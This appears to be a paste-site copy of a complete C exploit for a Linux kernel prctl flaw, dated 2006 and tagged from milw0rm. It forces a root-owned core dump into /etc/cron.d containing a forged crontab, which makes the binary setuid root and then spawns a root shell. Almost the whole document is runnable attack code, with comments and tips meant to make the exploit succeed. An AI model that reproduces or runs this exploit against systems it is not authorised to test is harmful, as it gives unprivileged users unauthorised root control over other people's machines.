
Linux >= 2.6.13 prctl kernel exploit

Jan 23rd, 2017
  1. /* Linux >= 2.6.13 prctl kernel exploit
  2.  *
  3.  * (C) Julien TINNES
  4.  *
  5.  * If you read the Changelog from 2.6.13 you've probably seen:
  6.  *  [PATCH] setuid core dump
  7.  *
 * The patch mainly adds a "suidsafe" mode (value 2) to the suid_dumpable sysctl,
 * but it also lets an unprivileged process hand that same value to
 * prctl(PR_SET_DUMPABLE), which should only have been accepted for 0 and 1.
 *
 * In suidsafe mode the kernel writes the core file as root, into the process's
 * current working directory. chdir() into a directory that a root daemon reads
 * (here /etc/cron.d), crash, and you have dropped a root-owned file with
 * attacker-chosen contents there. This is trivially exploitable.
  13.  *
  14.  */
  15.  
  16. #include <sys/types.h>
  17. #include <sys/time.h>
  18. #include <sys/resource.h>
  19. #include <sys/prctl.h>
  20. #include <unistd.h>
  21. #include <stdio.h>
  22. #include <errno.h>
  23. #include <signal.h>
  24. #include <stdlib.h>
  25. #include <time.h>
  26.  
/* Directory whose files cron(8) reads as root-owned crontabs; the core lands here. */
#define CROND "/etc/cron.d"
/* Size of the scratch buffers holding the forged crontab and our own path. */
#define BUFSIZE 2048

/* Unlimited core size, so the kernel is willing to write the dump at all. */
struct rlimit myrlimit = {
    .rlim_cur = RLIM_INFINITY,
    .rlim_max = RLIM_INFINITY,
};

/*
 * Crontab template. Its conversions are filled in, in order, with:
 *   %s  a newline, which terminates the leading "#" comment line
 *   %s  our own path (chown target)
 *   %s  our own path again (chmod target)
 *   %s  the core file to delete once the job has run
 *   %d  our pid, signalled with USR1 when the binary is setuid root
 */
char crontemplate[] =
    "#/etc/cron.d/core suid_dumpable exploit\n"
    "SHELL=/bin/sh\n"
    "PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n"
    "#%s* * * * *   root     chown root:root %s && chmod 4755 %s && rm -rf %s && kill -USR1 %d\n";

char cronstring[BUFSIZE];   /* the forged crontab; ends up inside the child's core dump */
char fname[BUFSIZE];        /* our own path, resolved from /proc/self/exe */

struct timeval te;          /* scratch timeval for the wait-time message */
  43.  
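/*
 * SIGUSR1 handler. The cron job sends USR1 once it has made our binary
 * setuid root, so we re-exec ourselves (fname, resolved in main()); the
 * new image enters main() with euid 0 and takes the root-shell branch.
 *
 * Only async-signal-safe calls are used: execve() has always been on
 * POSIX's safe list and execl() was added in later revisions, and the
 * failure report goes through write(2) rather than perror()/printf(),
 * which are not safe inside a handler. execl() only returns on failure
 * (e.g. fname is empty because readlink() failed); control then goes back
 * to the interrupted sleep in main(), which reports the exploit as failed.
 */
void sh(int sn) {
    static const char msg[] = "[-] execl in SIGUSR1 handler failed\n";

    (void) sn;  /* the signal number is not needed */
    execl(fname, fname, (char *) NULL);
    if (write(STDERR_FILENO, msg, sizeof(msg) - 1) < 0) {
        /* nothing safe left to do from a handler */
    }
}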
  47.      
  48.  
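/*
 * Second life of the binary: once cron has made us setuid root, the USR1
 * handler re-execs us and we arrive here with euid 0. Become uid/gid 0
 * for real and replace ourselves with /bin/sh. Returns 1 only on failure.
 */
static int spawn_root_shell(void) {
    printf("[+] getting root shell\n");
    /* conventional order: gid first, then uid; failures are reported, not fatal */
    if (setgid(0) == -1)
        perror("[-] setgid (continuing)");
    /* without a real uid of 0 most shells drop the effective uid on startup */
    if (setuid(0) == -1)
        perror("[-] setuid (continuing)");
    execl("/bin/sh", "/bin/sh", (char *) NULL);
    perror("[-] execl");    /* execl() only returns on failure */
    return 1;
}

/*
 * Fill cronstring with the crontab that cron will find inside the core
 * dump: it makes our own binary (fname) setuid root, deletes the core file
 * and signals us with USR1. Returns 0 on success, -1 if the template does
 * not fit in the buffer (or snprintf() fails).
 */
static int forge_cron_payload(void) {
    int nw = snprintf(cronstring, sizeof(cronstring), crontemplate,
                      "\n", fname, fname, CROND "/core", (int) getpid());

    if (nw < 0 || (size_t) nw >= sizeof(cronstring)) {
        printf("[-] cronstring is too small\n");
        return -1;
    }
    return 0;
}

/*
 * Entry point. Runs in two modes:
 *
 *  - euid != 0 (first run, as an ordinary user): set the process up so that
 *    a forked child dumps core as root into /etc/cron.d, with a crontab
 *    embedded in its memory that makes this very binary setuid root and
 *    then signals us with SIGUSR1; sh() re-execs the binary on that signal.
 *  - euid == 0 (the re-exec'd, setuid-root copy): drop into a root shell.
 *
 * Returns 1 on any failure, or when the cron job did not run within two
 * minutes; on success it never returns (exec'd into a shell).
 *
 * Things to check before blaming the kernel: /etc/cron.d must be a directory
 * cron really reads; the binary must live on a filesystem mounted without
 * nosuid (or the chmod 4755 has no effect); and the kernel must name the
 * dump "core" in the cwd (default core_pattern, core_uses_pid=0), since
 * that is the name the crontab deletes. The cron line also has to survive
 * being surrounded by the binary contents of the core file.
 */
int main(int argc, char *argv[]) {
    pid_t pid;
    ssize_t len;
    time_t now;

    (void) argc;
    (void) argv;

    /* Are we the re-exec'd, now setuid-root, copy? */
    if (geteuid() == 0)
        return spawn_root_shell();

    printf("\nprctl() suidsafe exploit\n\n(C) Julien TINNES\n\n");

    /* get our file name; readlink() does not NUL-terminate, so leave room and do it ourselves */
    len = readlink("/proc/self/exe", fname, sizeof(fname) - 1);
    if (len == -1) {
        perror("[-] readlink");
        printf("This is not fatal, rewrite the exploit\n");
        fname[0] = '\0';    /* sh() will fail its execl() and report it */
    } else {
        fname[len] = '\0';
    }

    if (signal(SIGUSR1, sh) == SIG_ERR) {
        perror("[-] signal");
        return 1;
    }
    printf("[+] Installed signal handler\n");

    /* Let us create core files: a soft RLIMIT_CORE of 0 means no dump at all.
     * Raising the hard limit needs privileges, so if that fails fall back to
     * lifting the soft limit to whatever hard limit we already have. */
    if (setrlimit(RLIMIT_CORE, &myrlimit) == -1) {
        struct rlimit cur;

        if (getrlimit(RLIMIT_CORE, &cur) == -1) {
            perror("[-] getrlimit");
            return 1;
        }
        cur.rlim_cur = cur.rlim_max;
        if (cur.rlim_max == 0 || setrlimit(RLIMIT_CORE, &cur) == -1) {
            printf("[-] cannot enable core dumps (hard RLIMIT_CORE is 0 or not settable)\n");
            return 1;
        }
    }
    /* Core files land in the cwd, so make that cron's drop directory */
    if (chdir(CROND) == -1) {
        perror("[-] chdir");
        return 1;
    }

    /* exploit the flaw: 2 is "suidsafe", which an unprivileged caller should
     * never have been allowed to set; patched kernels reject it with EINVAL */
    if (prctl(PR_SET_DUMPABLE, 2) == -1) {
        perror("[-] prctl");
        printf("Is your kernel version >= 2.6.13 ?\n");
        return 1;
    }
    printf("[+] We are suidsafe dumpable!\n");

    if (forge_cron_payload() == -1)
        return 1;
    printf("[+] Malicious string forged\n");

    pid = fork();
    if (pid == -1) {
        perror("[-] fork");
        return 1;
    }
    if (pid == 0) {
        /* Child: just exist, with cronstring in its memory, until it is killed.
         * _exit() so that inherited stdio buffers are not flushed a second time. */
        sleep(120);
        _exit(0);
    }

    /* Parent: crash the child so the kernel writes its (root-owned) core here */
    printf("[+] Segfaulting child\n");
    if (kill(pid, SIGSEGV) == -1) {
        perror("[-] kill");
        return 1;
    }
    /* cron wakes up on minute boundaries, so that is the longest we should wait */
    now = time(NULL);
    if (now != (time_t) -1)
        printf("[+] Waiting for exploit to succeed (~%ld seconds)\n", (long) (60 - (now % 60)));
    /* SIGUSR1 interrupts this sleep and sh() execs; reaching the line below
     * means the cron job never ran (or the re-exec failed) */
    sleep(120);

    printf("[-] It looks like the exploit failed\n");

    return 1;
}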
  126.  
  127. // milw0rm.com [2006-07-12]